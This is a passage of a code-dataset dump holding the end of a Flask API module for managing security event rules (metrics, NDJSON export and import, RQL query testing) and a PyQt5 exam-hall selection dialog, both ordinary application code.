when the API is initialized\n if not args.start:\n args.start = (datetime.datetime.utcnow()-datetime.timedelta(days=7)).strftime('%Y-%m-%dT%H:%M:%S')\n if not args.end:\n args.end = (datetime.datetime.utcnow()+datetime.timedelta(days=1)).strftime('%Y-%m-%dT%H:%M:%S')\n\n # Compute the number of hits on an event rule\n if 'hits' in args.metrics:\n search = Event.search()\n\n search.aggs.bucket('range', 'filter', range={'created_at': {\n 'gte': args.start,\n 'lte': args.end\n }})\n \n if args.rules and len(args.rules) > 0:\n search = search.filter('terms', event_rules=args.rules)\n\n search.aggs['range'].bucket('event_rules', 'terms', order={'max_date': 'desc'}, field='event_rules', size=10000)\n search.aggs['range']['event_rules'].metric('max_date', 'max', field='created_at')\n search = search[:0]\n \n result = search.execute()\n\n # Prepare the hits metric\n if 'hits' in args.metrics:\n metrics['hits'] = {v['key']: v['doc_count'] for v in result.aggs.range.event_rules.buckets}\n metrics['last_hit'] = {v['key']: v['max_date']['value_as_string'] for v in result.aggs.range.event_rules.buckets}\n\n return metrics\n\n\nexport_rule_parser = api.parser()\nexport_rule_parser.add_argument('organizations', type=str, action='split', location='args', required=False)\n\n@api.route('/export')\nclass ExportEventRules(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.expect(export_rule_parser)\n @api.header('Content-Type', 'application/x-ndjson')\n @token_required\n @check_org\n @user_has('view_event_rules')\n def get(self, current_user):\n '''\n Takes a list of organizations and exports all the Event Rules for the supplied organizations\n as NDJSON, if no organizations are provided, just dump the rules for the users current\n organization.\n '''\n\n args = export_rule_parser.parse_args()\n\n event_rules = EventRule.search()\n\n if args.organizations:\n print(args.organizations)\n else: \n event_rules = event_rules.filter('term', organization=current_user.organization)\n \n event_rules = event_rules.scan() \n\n output = ndjson.dumps([marshal(e, mod_event_rule_list) for e in event_rules])\n resp = Response(output,headers={'Content-Type': 'application/x-ndjson', 'Content-disposition':'attachment; filename=event_rules.ndjson'})\n \n return resp\n\nupload_parser = api.parser()\nupload_parser.add_argument('files', location='files',\n type=FileStorage, required=True, action=\"append\")\n\n@api.route('/import')\nclass ImportEventRules(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.expect(upload_parser)\n @token_required\n @default_org\n @user_has('create_event_rule')\n def post(self, user_in_default_org, current_user):\n\n args = upload_parser.parse_args()\n\n def allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ['.ndjson']\n\n uploaded_files = args.files\n for uploaded_file in uploaded_files:\n print(uploaded_file)\n return \"\"\n\n\n@api.route(\"/test_rule_rql\")\nclass TestEventRQL(Resource):\n\n @api.expect(mod_event_rule_test)\n @token_required\n @default_org\n @user_has('create_event_rule')\n def post(self, user_in_default_org, current_user):\n ''' Tests an RQL query against a target event to see if the RQL is valid '''\n\n date_filtered = False\n\n event = None\n\n if ('query' in api.payload and api.payload['query'] == '') or 'query' not in api.payload:\n return {'message':'Missing RQL query.', \"success\": False}, 400\n\n if 'event_count' in api.payload and api.payload['event_count'] > 2147483647:\n api.abort(400, 'Number of test events can not exceed 2147483647')\n\n if 'uuid' in api.payload and api.payload['uuid'] not in [None, '']:\n event = Event.get_by_uuid(uuid=api.payload['uuid'])\n event_data = json.loads(json.dumps(marshal(event, mod_event_rql))) \n else:\n\n # A date filter is required when not supplying a single event UUID\n if 'start_date' in api.payload and 'end_date' in api.payload:\n date_filtered = True\n else:\n return {'message': 'A date range is required', \"succes\": False}, 400\n\n search = Event.search()\n \n if 'organization' in api.payload and api.payload['organization']:\n search = search.filter('term', organization=api.payload['organization'])\n else:\n if hasattr(current_user, 'default_org') and not current_user.default_org:\n search = search.filter('term', organization=current_user.organization)\n search = search.sort('-original_date')\n search = search[0:api.payload['event_count']]\n\n # Apply a date filter\n if date_filtered:\n search = search.filter('range', **{'original_date': {\n 'gte': api.payload['start_date'],\n 'lte': api.payload['end_date']\n }})\n\n if 'event_count' in api.payload and api.payload['event_count'] > 10000:\n events = list(search.scan())\n else:\n events = search.execute()\n \n event_data = [json.loads(json.dumps(marshal(e, mod_event_rql))) for e in events]\n \n try:\n organization = current_user.organization\n\n if event:\n if user_in_default_org and event.organization != current_user.organization:\n organization = event.organization\n else:\n if user_in_default_org and 'organization' in api.payload:\n organization = api.payload['organization']\n \n qp = QueryParser(organization=organization)\n parsed_query = qp.parser.parse(api.payload['query'])\n result = [r for r in qp.run_search(event_data, parsed_query)]\n hits = len(result)\n\n if hits > 0:\n if 'return_results' in api.payload and api.payload['return_results']:\n return {\"message\": f\"Query matched {hits} Events\", \"success\": True, \"hits\": [result]}, 200\n return {\"message\": f\"Query matched {hits} Events\", \"success\": True}, 200\n else:\n return {\"message\": \"Query did not match target Event\", \"success\": False}, 200\n except ValueError as e:\n return {\"message\":f\"Invalid RQL query. {e}\", \"success\": False}, 400\n ","repo_name":"reflexsoar/reflex-api","sub_path":"app/api_v2/resource/event_rule.py","file_name":"event_rule.py","file_ext":"py","file_size_in_byte":25841,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20892905365","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QDialog, QFileDialog\n\nfrom hall_select import HallSelect\n\n\nclass Ui_DialogHalls(QDialog):\n def __init__(self, centralWidget, classes, totalStudents):\n super().__init__()\n self.classes = classes\n self.totalStudents = totalStudents\n self.centralWidget = centralWidget\n self.setupUi()\n self.exec()\n\n def setupUi(self):\n self.setObjectName(\"Dialog\")\n self.resize(566, 193)\n self.setStyleSheet(\"background-color: rgb(20, 24, 34);\")\n self.frame = QtWidgets.QFrame(self)\n self.frame.setGeometry(QtCore.QRect(0, 0, 291, 341))\n self.frame.setStyleSheet(\"font: 75 11pt \\\"Uroob\\\";\\n\"\n \"background-color: rgb(239, 41, 41);\")\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.label = QtWidgets.QLabel(self.frame)\n self.label.setGeometry(QtCore.QRect(30, 50, 221, 41))\n font = QtGui.QFont()\n font.setFamily(\"Ubuntu Condensed\")\n font.setPointSize(15)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(6)\n self.label.setFont(font)\n self.label.setStyleSheet(\"font: 50 15pt \\\"Ubuntu Condensed\\\";\")\n self.label.setObjectName(\"label\")\n self.pushButton = QtWidgets.QPushButton(self.frame)\n self.pushButton.setGeometry(QtCore.QRect(90, 100, 89, 25))\n self.pushButton.setObjectName(\"pushButton\")\n self.label_2 = QtWidgets.QLabel(self)\n self.label_2.setGeometry(QtCore.QRect(310, 60, 241, 31))\n self.label_2.setStyleSheet(\"font: 75 20pt \\\"Ubuntu Condensed\\\";\\n\"\n \"color: rgb(204, 0, 0);\")\n self.label_2.setObjectName(\"label_2\")\n self.pushButton_2 = QtWidgets.QPushButton(self)\n self.pushButton_2.setGeometry(QtCore.QRect(380, 100, 89, 25))\n self.pushButton_2.setStyleSheet(\"background-color: rgb(239, 41, 41);\\n\"\n \"border-color: rgb(115, 210, 22);\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n\n self.retranslateUi()\n QtCore.QMetaObject.connectSlotsByName(self)\n self.pushButton.clicked.connect(self.upload)\n self.pushButton_2.clicked.connect(self.select)\n\n def select(self):\n self.deleteLater()\n HallSelect(self.centralWidget, classes=self.classes, totalStudents=self.totalStudents, status=0)\n\n def upload(self):\n self.deleteLater()\n directory = QFileDialog.getOpenFileName()\n directory = directory[0]\n\n HallSelect(self.centralWidget, classes=self.classes, totalStudents=self.totalStudents, status=1)\n\n def retranslateUi(self):\n _translate = QtCore.QCoreApplication.translate\n self.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.label.setText(_translate(\"Dialog\", \"Upload ExamHalls file as .txt file\"))\n self.pushButton.setText(_translate(\"Dialog\", \"Upload\"))\n self.label_2.setText(_translate(\"Dialog\", \"Select from CheckBoxes\"))\n self.pushButton_2.setText(_translate(\"Dialog\", \"Select\"))\n","repo_name":"Sesuraj-git/SeatingAllotment","sub_path":"dialogHalls.py","file_name":"dialogHalls.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}